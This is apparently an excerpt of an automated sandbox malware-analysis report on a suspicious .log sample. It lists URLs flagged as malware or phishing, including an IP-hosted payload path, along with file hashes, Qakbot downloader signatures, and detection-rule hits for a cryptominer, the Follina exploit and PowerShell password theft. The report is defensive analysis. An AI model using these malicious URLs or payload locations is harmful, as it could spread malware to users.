                        • Avira URL Cloud: safe
                        		unknown
                        https://lidamtour.com/masivo/ala/cronsrt/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://thomastongrealestate.com/skywkc/3415201.pngaApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://lidamtour.com/masivo/file/kmshost/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://ab.v-mail.online/?e=App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://107.173.143.102/hhh/invc_005400005400.wbknotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        No contacted IP infos

                        General Information

                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:743454
                        Start date and time:2022-11-10 21:14:46 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 51s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:4
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.mine.winLOG@1/0@0/0
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .log

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:data
                        Entropy (8bit):7.001609475452913
                        TrID:
                        • MP3 audio (ID3 v1.x tag) (2501/1) 71.42%
                        • MP3 audio (1001/1) 28.58%
                        File name:App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
                        File size:20971520
                        MD5:988e0cb19fbc2cf5e3b9a33b205affd8
                        SHA1:1b091e30aa366a5cdf582a81954893ac6201f769
                        SHA256:c289adee6ca95bb69f864497f32a8abbad65d20dccd06c4a1f6c3ef6d402693d
                        SHA512:03b01dce8b2e53d4aa3735483cc0111298f02e31fc21010da57a0c31b8d8340170d3d74639e658f7f45456c11d811b025e26f4131d646112038d3f79c844f84c
                        SSDEEP:196608:4qvvbS9+lFh9AUwoupfvAdcUPPEXoEIJfEt3nvpn0A9bkWAJLaJEtTiVJkQ5uZTz:4K3lFh9Q7NXItEFvpn07YUiUF//dhr5
                        TLSH:8427AE5BB3A400E4D1B6C274C5169B67EBB27C0A1B2197CB1760765A2F336F18A3B3D1
                        File Content Preview:.K...jjccbbflaster1.ocxflaster3.ocxpasel32kernwnloadtoflaster2.ocxc:\nasterosa..)...-!#SCPT:TrojanDownloader:O97M/Qakbot.PDO85!MTB......K...c:\hefaggad\ukdfaovkga\buuefafa.dll...c:\hefaggad\ukdfaovkga\buuefafb.dll..)...-!#SCPT:TrojanDownloader:Win32/Lnkge

                        File Icon

                        Icon Hash:74f4e4e4e4e4e4e4

                        Network Behavior

                        No network behavior found

                        Statistics

                        No statistics

                        System Behavior

                        General

                        Target ID:0
                        Start time:21:15:40
                        Start date:10/11/2022
                        Path:C:\Windows\System32\notepad.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
                        Imagebase:0x7ff6b07c0000
                        File size:245760 bytes
                        MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword, Description: Detects PowerShell content designed to retrieve passwords from host, Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:high

                        Disassembly

                        No disassembly